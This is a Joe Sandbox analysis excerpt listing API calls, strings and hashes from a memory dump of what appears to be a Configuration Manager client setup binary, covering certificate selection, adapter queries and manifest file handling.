                                                                                          • API ID: AllocAllocateHeapVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 1838633152-0
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(0093A01C,00000000,-000000F8,0093A01C,0093A01C,?,0059EF40,?,?,?,?,?,0059EAD0,00000001,?), ref: 006159D5
                                                                                          • VirtualFree.KERNEL32(-000000F8,00000000,00008000,0093A01C,0093A01C,?,0059EF40,?,?,?,?,?,0059EAD0,00000001,?), ref: 006159E5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Free$HeapVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 3783212868-0
                                                                                          APIs
                                                                                          • ___crtCorExitProcess.LIBCMT ref: 005D4DC5
                                                                                            • Part of subcall function 005D4D8B: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,005D4DCA,?,?,005D1F6E,000000FF,0000001E,00000000,00000000,00000000,?,005D511B), ref: 005D4D9A
                                                                                            • Part of subcall function 005D4D8B: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 005D4DAC
                                                                                          • ExitProcess.KERNEL32 ref: 005D4DCE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                          • String ID:
                                                                                          • API String ID: 2427264223-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch
                                                                                          • String ID:
                                                                                          • API String ID: 3886170330-0
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 0059F0C8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw
                                                                                          • String ID:
                                                                                          • API String ID: 2005118841-0
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 0061535C
                                                                                            • Part of subcall function 00619E0D: GetSystemInfo.KERNEL32(?), ref: 00619E30
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3InfoSystem
                                                                                          • String ID:
                                                                                          • API String ID: 1451917602-0
                                                                                          APIs
                                                                                          • GetSystemInfo.KERNEL32(?), ref: 00619E30
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoSystem
                                                                                          • String ID:
                                                                                          • API String ID: 31276548-0
                                                                                          • Opcode ID: 60323ce5d7024ea7afcad7d3ffaf6f1267826893e30ab7f3d42c8ec2a3b0cefe
                                                                                          • Instruction ID: dcef953d506717f46b155da56e8a732a7693d73d4f49abb1390a9bcab66ace8c
                                                                                          • Opcode Fuzzy Hash: 60323ce5d7024ea7afcad7d3ffaf6f1267826893e30ab7f3d42c8ec2a3b0cefe
                                                                                          • Instruction Fuzzy Hash: DFE0C23591422847C714ABBCA8085E973EDEB4E322F000076EC19D3310E973DC828FE2
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 00577FDB
                                                                                            • Part of subcall function 005775C6: __EH_prolog3.LIBCMT ref: 005775CD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: H_prolog3
                                                                                          • String ID:
                                                                                          • API String ID: 431132790-0
                                                                                          • Opcode ID: ccbfe2f28b4817e873ef94974c7117c40cd7e3b45d15a9ea70192554c80338af
                                                                                          • Instruction ID: 120c70ed7e9d5bb22cde347b8341904b078828bf59a827c722a57548467e26f6
                                                                                          • Opcode Fuzzy Hash: ccbfe2f28b4817e873ef94974c7117c40cd7e3b45d15a9ea70192554c80338af
                                                                                          • Instruction Fuzzy Hash: 11E08670D0520A9ACB15FFA8550679D7E71BF84310F10865FB459A73C1CE700B149751
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: H_prolog3
                                                                                          • String ID:
                                                                                          • API String ID: 431132790-0
                                                                                          • Opcode ID: a23258bd2c3a0ff8db0d5b3b45f2e2984a239e5f15dfcc25933fdcfbccd9e676
                                                                                          • Instruction ID: 2c33e686ca615bd3508b3365caf35af80af227386a71faa78578e77f46ce22d9
                                                                                          • Opcode Fuzzy Hash: a23258bd2c3a0ff8db0d5b3b45f2e2984a239e5f15dfcc25933fdcfbccd9e676
                                                                                          • Instruction Fuzzy Hash: 56E0BF74501206DBCB18EFB8D90555D7F71BF46320B6487AEA0359F2E1C7719A02DB50
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 005F425A
                                                                                            • Part of subcall function 005F4099: __EH_prolog3.LIBCMT ref: 005F40A0
                                                                                            • Part of subcall function 005F4CCF: __EH_prolog3_catch.LIBCMT ref: 005F4CD6
                                                                                            • Part of subcall function 005F4CCF: GetCurrentThreadId.KERNEL32 ref: 005F4D29
                                                                                            • Part of subcall function 005F4CCF: __CxxThrowException@8.LIBCMT ref: 005F4D9C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$CurrentException@8H_prolog3_catchThreadThrow
                                                                                          • String ID:
                                                                                          • API String ID: 2746221494-0
                                                                                          • Opcode ID: 50a19a60cfbee5fb72b0a4da8c884eaf1505b99906f3011bc0a8b102c0799e31
                                                                                          • Instruction ID: d204e51ca641f65d10a1f9b8285d30b0b2f2cbcf5139af3a12308843e6b1ed26
                                                                                          • Opcode Fuzzy Hash: 50a19a60cfbee5fb72b0a4da8c884eaf1505b99906f3011bc0a8b102c0799e31
                                                                                          • Instruction Fuzzy Hash: 4AE046B490020AEBDF01EF50C809BAD7B72BFA4312F008409FA041E381CBB99A51DF40
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 005F2175: __EH_prolog3_catch_GS.LIBCMT ref: 005F217F
                                                                                            • Part of subcall function 005F2175: TlsGetValue.KERNEL32 ref: 005F21EC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catch_ThreadValue
                                                                                          • String ID:
                                                                                          • API String ID: 528860816-0
                                                                                          • Opcode ID: 39b1d3b361005d4e4eb15676faa233f8cf2f334262bcaa0f5563f28b55d13586
                                                                                          • Instruction ID: f061a1e2ad0becad2a63216539d302835ac98c3787f4fed8eacb65523a54a98c
                                                                                          • Opcode Fuzzy Hash: 39b1d3b361005d4e4eb15676faa233f8cf2f334262bcaa0f5563f28b55d13586
                                                                                          • Instruction Fuzzy Hash: 99D09276000108BF8B02AF94EC08CAA7FAEFB88310B058051FA1C8A131CA32E965DB50
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 0057117F
                                                                                            • Part of subcall function 00615355: __EH_prolog3.LIBCMT ref: 0061535C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: H_prolog3
                                                                                          • String ID:
                                                                                          • API String ID: 431132790-0
                                                                                          • Opcode ID: 950561c004b513b0ad419cd7084d4d558a54c5a325d4ee4fc0eb35d3a2fa3b0e
                                                                                          • Instruction ID: 3b5b0a04c65a2e9342e9ed5eec925133a9502670a5e4b7bcfa57025863f0be60
                                                                                          • Opcode Fuzzy Hash: 950561c004b513b0ad419cd7084d4d558a54c5a325d4ee4fc0eb35d3a2fa3b0e
                                                                                          • Instruction Fuzzy Hash: B5C0122469070255D7267278081B78D2F066FC4770F50525BF2A16E3C68DE595410A15
                                                                                          APIs
                                                                                            • Part of subcall function 005781C3: LocalFree.KERNEL32 ref: 005781D2
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: FreeLocal
                                                                                          • String ID:
                                                                                          • API String ID: 2826327444-0
                                                                                          • Opcode ID: efe955568bdeb3793b2dbf4e820118a0a9c30014b9a8e436e6159072b5b843c8
                                                                                          • Instruction ID: 7b36521816a2646e219bb15c3cdb4a6f508da761afc42219933e56183e619835
                                                                                          • Opcode Fuzzy Hash: efe955568bdeb3793b2dbf4e820118a0a9c30014b9a8e436e6159072b5b843c8
                                                                                          • Instruction Fuzzy Hash: 89319C30A48398E9EB25DB64CD5EBDCBB70AB51704F6044DAE2093B1C2DBB41F88CB51
                                                                                          APIs
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: FreeLocal
                                                                                          • String ID:
                                                                                          • API String ID: 2826327444-0
                                                                                          • Opcode ID: 83eb89d37b0b5cd8b9d5e55d46ab7cdc993390ea783aad66c0748862dada1269
                                                                                          • Instruction ID: 9ea9bf35d02330dae21ffe81958af0c8f66ab23f47e0ef6adabb8192ab7d344a
                                                                                          • Opcode Fuzzy Hash: 83eb89d37b0b5cd8b9d5e55d46ab7cdc993390ea783aad66c0748862dada1269
                                                                                          • Instruction Fuzzy Hash: 27218D30A48388E9EB25DB64CD5BBDCBB70AB51704F6044DAE2057B1C2D7B51B48DB51
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00627074
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006271F3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062725D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006272A8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062736A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00627419
                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00628423
                                                                                          • CertFreeCertificateContext.CRYPT32(?), ref: 00628434
                                                                                          • CertFreeCertificateContext.CRYPT32(?), ref: 00628445
                                                                                          Strings
                                                                                          • ..\CcmCert.cpp, xrefs: 006280D2
                                                                                          • ..\CcmCert.cpp, xrefs: 00627B6B
                                                                                          • ..\CcmCert.cpp, xrefs: 00627632
                                                                                          • There are at least 2 certificates valid for ConfigMgr usage that meet the selection criteria. The '%s' registry entry was set to O, xrefs: 006281AF
                                                                                          • ..\CcmCert.cpp, xrefs: 00627E91
                                                                                          • ..\CcmCert.cpp, xrefs: 00627269
                                                                                          • `, xrefs: 006282F4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627804
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00628066
                                                                                          • ..\CcmCert.cpp, xrefs: 00627DDA
                                                                                          • ..\CcmCert.cpp, xrefs: 006277F9
                                                                                          • ..\CcmCert.cpp, xrefs: 00627425
                                                                                          • ..\CcmCert.cpp, xrefs: 00627BEF
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006272A3
                                                                                          • GetCertificateInStoreByCertNameEx( hChainEngine, hStore, sData, bCertFirstFlag, dwValidationFlags, ppCertContext), xrefs: 006277FF
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627F98
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627258
                                                                                          • CcmUtilLib::GetCertificate, xrefs: 006271A2
                                                                                          • 0 != hStore, xrefs: 0062729E
                                                                                          • ::CertStrToNameW( 0x00000001, (LPCWSTR)sCN, 3, 0, (LPBYTE)bbData.getBuffer(), &cbData, 0 ), xrefs: 00628061
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627E9C
                                                                                          • saParts.size() > 0, xrefs: 00627360
                                                                                          • ..\CcmCert.cpp, xrefs: 00627AF1
                                                                                          • ::CryptDecodeObject( 0x00000001 | 0x00010000, ((LPCSTR) 20), (LPBYTE)bbData.getBuffer(), cbData, 0, 0, &dwLen ), xrefs: 006279FC
                                                                                          • ::CertStrToNameW( 0x00000001, (LPCWSTR)sFindPara, dwStrType, 0, 0, &cbData, 0 ), xrefs: 006278B2
                                                                                          • ..\CcmCert.cpp, xrefs: 00627CF3
                                                                                          • ..\CcmCert.cpp, xrefs: 0062724D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627FEE
                                                                                          • ..\CcmCert.cpp, xrefs: 00627997
                                                                                          • There are no certificate(s) that meet the criteria., xrefs: 006282FE
                                                                                          • ..\CcmCert.cpp, xrefs: 00627376
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062825A
                                                                                          • 0 != ppCertContext, xrefs: 00627253
                                                                                          • (stEnhKeyUsage.rgpszUsageIdentifier[dwIdx]) != 0, xrefs: 006274C5
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006271EE
                                                                                          • ..\CcmCert.cpp, xrefs: 00627FA5
                                                                                          • ..\CcmCert.cpp, xrefs: 00627A4A
                                                                                          • ..\CcmCert.cpp, xrefs: 006279F6
                                                                                          • ..\CcmCert.cpp, xrefs: 00627409
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627CFE
                                                                                          • (stEnhKeyUsage.rgpszUsageIdentifier) != 0, xrefs: 0062740F
                                                                                          • ..\CcmCert.cpp, xrefs: 006271E3
                                                                                          • ..\CcmCert.cpp, xrefs: 006274BF
                                                                                          • String::npos != nPOS, xrefs: 00627638
                                                                                          • 2.5.29.17, xrefs: 00627727
                                                                                          • Invalid criteria format: %s, xrefs: 00627EE2
                                                                                          • Select First Certificate, xrefs: 006281AA
                                                                                          • t)l, xrefs: 006278D4
                                                                                          • ., xrefs: 00627828
                                                                                          • Skipping this certificate that is not valid for ConfigMgr usage., xrefs: 006282AC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062763D
                                                                                          • (pName) != 0, xrefs: 00627A50
                                                                                          • Invalid criteria format: %s, xrefs: 00627683
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627DC9
                                                                                          • ..\CcmCert.cpp, xrefs: 00627D0F
                                                                                          • ..\CcmCert.cpp, xrefs: 00627B09
                                                                                          • Performing SubjectAttr to SAN2 search., xrefs: 0062779F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062790D
                                                                                          • ..\CcmCert.cpp, xrefs: 00627DBE
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627AFC
                                                                                          • 0 != pTempCertContext, xrefs: 00628255
                                                                                          • ..\CcmCert.cpp, xrefs: 0062791E
                                                                                          • ..\CcmCert.cpp, xrefs: 00627811
                                                                                          • ..\CcmCert.cpp, xrefs: 00627B87
                                                                                          • ..\CcmCert.cpp, xrefs: 0062735A
                                                                                          • ..\CcmCert.cpp, xrefs: 00627F8D
                                                                                          • cn=%s, xrefs: 00627F0D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627414
                                                                                          • bbData.resize( cbData ), xrefs: 00627FE9
                                                                                          • ..\CcmCert.cpp, xrefs: 0062797F
                                                                                          • (pAttr->pszObjId) != 0, xrefs: 00627CF9
                                                                                          • ::CertStrToNameW( 0x00000001, (LPCWSTR)sCN, 3, 0, 0, &cbData, 0 ), xrefs: 00627F93
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062758B
                                                                                          • Invalid criteria format: %s, xrefs: 006273AB
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627B76
                                                                                          • ::CryptDecodeObject( 0x00000001 | 0x00010000, ((LPCSTR) 20), (LPBYTE)bbData.getBuffer(), cbData, 0, pName, &dwLen ), xrefs: 00627AF7
                                                                                          • ..\CcmCert.cpp, xrefs: 00627298
                                                                                          • ..\CcmCert.cpp, xrefs: 00627FFF
                                                                                          • ..\CcmCert.cpp, xrefs: 0062764E
                                                                                          • ..\CcmCert.cpp, xrefs: 00627A0E
                                                                                          • ..\CcmCert.cpp, xrefs: 00627FE3
                                                                                          • cRDNs > 0, xrefs: 00627B71
                                                                                          • =, xrefs: 006275F2
                                                                                          • B, xrefs: 006281A0
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627BFA
                                                                                          • ..\CcmCert.cpp, xrefs: 006280EA
                                                                                          • (pAttr->Value.pbData) != 0, xrefs: 00627DC4
                                                                                          • x, xrefs: 00627678
                                                                                          • ..\CcmCert.cpp, xrefs: 00628073
                                                                                          • X, xrefs: 006282A2
                                                                                          • p, xrefs: 006275C6
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627365
                                                                                          • ..\CcmCert.cpp, xrefs: 006278AC
                                                                                          • ..\CcmCert.cpp, xrefs: 006278C4
                                                                                          • ..\CcmCert.cpp, xrefs: 00627A66
                                                                                          • ..\CcmCert.cpp, xrefs: 0062824F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627A01
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006278B7
                                                                                          • (paIdAttr) != 0, xrefs: 00627BF5
                                                                                          • ..\CcmCert.cpp, xrefs: 0062759C
                                                                                          • ..\CcmCert.cpp, xrefs: 006272B4
                                                                                          • ..\CcmCert.cpp, xrefs: 006274DB
                                                                                          • ..\CcmCert.cpp, xrefs: 00627EAD
                                                                                          • sFindPara.length() > 0, xrefs: 006271E9
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627A55
                                                                                          • (sOID.length() > 0) && (sData.length() > 0), xrefs: 00627E97
                                                                                          • Invalid criteria format: %s, xrefs: 006275D1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006280DD
                                                                                          • bbData.resize( cbData ), xrefs: 00627908
                                                                                          • ..\CcmCert.cpp, xrefs: 00627580
                                                                                          • ..\CcmCert.cpp, xrefs: 00628267
                                                                                          • ..\CcmCert.cpp, xrefs: 00627902
                                                                                          • saParts.size() > 0, xrefs: 00627586
                                                                                          • cn=, xrefs: 00627EF3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062798A
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006274CA
                                                                                          • ::CertStrToNameW( 0x00000001, (LPCWSTR)sFindPara, dwStrType, 0, (LPBYTE)bbData.getBuffer(), &cbData, 0 ), xrefs: 00627985
                                                                                          • ..\CcmCert.cpp, xrefs: 0062805B
                                                                                          • ..\CcmCert.cpp, xrefs: 00627C0B
                                                                                          • HexBinaryDecode( sFindPara, &pbData, &cbData), xrefs: 006280D8
                                                                                          • ..\CcmCert.cpp, xrefs: 006271FF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Free$CertCertificateContext$H_prolog3H_prolog3_catch_Task
                                                                                          • API String ID: 1441946896-3622335582
                                                                                          • Opcode ID: 156f47d0204eada7fac23c761f424919d67c4018c9c992a2357566e2e6de75a9
                                                                                          • Instruction ID: f28e1a1cb28dbf91e2c56538d5064e443afca51b826e2689d6f874e21514b0e1
                                                                                          • Opcode Fuzzy Hash: 156f47d0204eada7fac23c761f424919d67c4018c9c992a2357566e2e6de75a9
                                                                                          • Instruction Fuzzy Hash: 38B2ACB0941229EEEB20DF64DC49FEEBBB9BB44704F0041D9E509A7281DB759E81CF60
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 006763E2
                                                                                          • GetAdaptersInfo.IPHLPAPI(?,?), ref: 00676466
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006764B9
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00676534
                                                                                          • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 0067654B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006766D8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00676587
                                                                                            • Part of subcall function 00676FC8: __EH_prolog3_catch_GS.LIBCMT ref: 00676FCF
                                                                                            • Part of subcall function 00676FC8: GetCurrentThreadId.KERNEL32 ref: 0067702F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0067684F
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006766D3
                                                                                          • Failed to retrieve adapter information., xrefs: 006765B8
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0067652F
                                                                                          • (pInfo) != 0, xrefs: 006764AF
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00676582
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 0067653C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006764B4
                                                                                          • Adapter %s is DHCP enabled. Checking quarantine status., xrefs: 00676657
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 0067683F
                                                                                          • IsValidIpv4Address((pAddr->IpAddress).String, bv4), xrefs: 006766CE
                                                                                          • Obtained %d IPv4 addresses., xrefs: 006767AC
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 00676524
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 00676577
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 0067685B
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006764C1
                                                                                          • IsValidIpv4Address((pAddr->IpAddress).String, bv4), xrefs: 00676845
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 0067658F
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006766C8
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006766E4
                                                                                          • CcmUtilLib::GetIPV4AddressInformation, xrefs: 00676420
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0067684A
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006764A9
                                                                                          • GetAdaptersInfo(pInfo, &ulSize), xrefs: 0067657D
                                                                                          • dwRet, xrefs: 0067652A
                                                                                          • Failed to check if the address is v4 (0x%08x), xrefs: 0067671D
                                                                                          • Failed to check if the address is v4 (0x%08x), xrefs: 00676894
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$AdaptersH_prolog3_catch_Info
                                                                                          • API String ID: 263454988-3015325420
                                                                                          • Opcode ID: cfc65f1fb0e378d483c25d1d3999c2be3a9db23c5cfa6008000553a97e28b505
                                                                                          • Instruction ID: 80ec8549196ebb64e7ab88d856720e1d2096699edd0570b83aefe76071f4291e
                                                                                          • Opcode Fuzzy Hash: cfc65f1fb0e378d483c25d1d3999c2be3a9db23c5cfa6008000553a97e28b505
                                                                                          • Instruction Fuzzy Hash: 55D1C171D41269AAEB20DB61CC49BEEBBB9BB45704F1080D9F50CB7281D7B49B84CF61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0058940B
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005A7D95: __EH_prolog3_catch.LIBCMT ref: 005A7D9C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005894C7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005895B4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00589696
                                                                                            • Part of subcall function 00605EB4: __EH_prolog3_catch_GS.LIBCMT ref: 00605EBB
                                                                                            • Part of subcall function 00605EB4: GetCurrentThreadId.KERNEL32 ref: 00605F0E
                                                                                            • Part of subcall function 0057D3CB: __EH_prolog3_catch_GS.LIBCMT ref: 0057D3D5
                                                                                            • Part of subcall function 0057D3CB: GetCurrentThreadId.KERNEL32 ref: 0057D46F
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 005897CC
                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00589901
                                                                                          • FindClose.KERNEL32(00000000), ref: 0058991F
                                                                                          Strings
                                                                                          • 4?k, xrefs: 0058961E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00589691
                                                                                          • %, xrefs: 00589AF2
                                                                                          • 4[k, xrefs: 00589BBD
                                                                                          • ccmsetup.cpp, xrefs: 005895A4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005894C2
                                                                                          • The manifest has no files that require download or installation., xrefs: 00589BCB
                                                                                          • ., xrefs: 00589804
                                                                                          • ccmsetup.cpp, xrefs: 0058969E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005895AF
                                                                                          • File '%s' is a local file. No need to download., xrefs: 00589633
                                                                                          • GetFileNameFromQualifiedPath( sFileName, sPackageName ), xrefs: 0058968C
                                                                                          • client.msi, xrefs: 005896DC, 00589707
                                                                                          • oSetupManifest.GetInstallInfo( iIndex, sFileName, sParams, installType, arrSuccessReturnCodes, &bImpactClientState, 0, 0, &bLocal , xrefs: 005895AA
                                                                                          • oSetupManifest.GetInstallListCount( iFileCount ), xrefs: 005894BD
                                                                                          • ccmsetup.cpp, xrefs: 00589686
                                                                                          • ccmsetup.cpp, xrefs: 005894B7
                                                                                          • ccmsetup.cpp, xrefs: 005895BC
                                                                                          • CcmSetup::GetDownloadFileList, xrefs: 00589467
                                                                                          • ccmsetup.cpp, xrefs: 005894CF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
